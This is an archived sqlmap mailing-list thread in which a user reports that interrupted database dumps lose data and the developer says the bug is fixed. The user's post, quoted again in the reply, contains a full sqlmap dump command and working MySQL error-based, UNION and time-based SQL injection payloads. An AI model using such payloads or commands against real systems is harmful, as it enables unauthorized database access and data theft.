sqlmap-users

[sqlmap-users] Data Dumping Problem

[<nig...@em...>]

Hy

I have a problem with data dumping.

When i run this  sqlmap -u "http://website.com/vuln.php" --cookie="cookies" --random-agent --retries=6 --level 5 --risk 3 --dump -D database -T table

Place: GET
Parameter: id
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: section=502&action=view_all_albums&id=83389 AND (SELECT 8070 FROM(SELECT COUNT(*),CONCAT(CHAR(58,106,115,109,58),(SELECT (CASE WHEN (8070=8070) THEN 1 ELSE 0 END)),CHAR(58,103,103,97,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 11 to 20 columns
    Payload: section=502&action=view_all_albums&id=-5690 UNION ALL SELECT NULL, CONCAT(CHAR(58,106,115,109,58),IFNULL(CAST(CHAR(82,121,113,115,106,81,100,117,77,99) AS CHAR),CHAR(32)),CHAR(58,103,103,97,58)), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: section=502&action=view_all_albums&id=83389 AND SLEEP(5

sqlmap runs normal shows me the data. Now the Problem when i break up in the middle of dumping sqlmap don´t save the already received data in a csv only the first received data from the DB found in the csv.

if I wait to sqlmap finished  the dumping, is all ok and i find all data in the csv. In an earlier version of sqlmap the data from a stoped dumping still found in the csv.

PS i know my english is terrible. But i hope you understand my problem. ;)

Re: [sqlmap-users] Data Dumping Problem

[Miroslav S. <mir...@gm...>]

hi nightman and everybody else.

this was a really nasty bug which prevented proper handling of dumped
data after Ctrl+C was pressed.

this should be fixed with the last commit (r4034).

kr

On Sun, Jun 5, 2011 at 4:12 PM,  <nig...@em...> wrote:
> Hy
>
> I have a problem with data dumping.
>
> When i run this  sqlmap -u "http://website.com/vuln.php" --cookie="cookies" --random-agent --retries=6 --level 5 --risk 3 --dump -D database -T table
>
> Place: GET
> Parameter: id
>     Type: error-based
>     Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
>     Payload: section=502&action=view_all_albums&id=83389 AND (SELECT 8070 FROM(SELECT COUNT(*),CONCAT(CHAR(58,106,115,109,58),(SELECT (CASE WHEN (8070=8070) THEN 1 ELSE 0 END)),CHAR(58,103,103,97,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
>
>     Type: UNION query
>     Title: MySQL UNION query (NULL) - 11 to 20 columns
>     Payload: section=502&action=view_all_albums&id=-5690 UNION ALL SELECT NULL, CONCAT(CHAR(58,106,115,109,58),IFNULL(CAST(CHAR(82,121,113,115,106,81,100,117,77,99) AS CHAR),CHAR(32)),CHAR(58,103,103,97,58)), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#
>
>     Type: AND/OR time-based blind
>     Title: MySQL > 5.0.11 AND time-based blind
>     Payload: section=502&action=view_all_albums&id=83389 AND SLEEP(5
>
> sqlmap runs normal shows me the data. Now the Problem when i break up in the middle of dumping sqlmap don´t save the already received data in a csv only the first received data from the DB found in the csv.
>
> if I wait to sqlmap finished  the dumping, is all ok and i find all data in the csv. In an earlier version of sqlmap the data from a stoped dumping still found in the csv.
>
> PS i know my english is terrible. But i hope you understand my problem. ;)
>
> ------------------------------------------------------------------------------
> Simplify data backup and recovery for your virtual environment with vRanger.
> Installation's a snap, and flexible recovery options mean your data is safe,
> secure and there when you need it. Discover what all the cheering's about.
> Get your free trial download today.
> http://p.sf.net/sfu/quest-dev2dev2
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>



-- 
Miroslav Stampar

E-mail: miroslav.stampar (at) gmail.com
PGP Key ID: 0xB5397B1B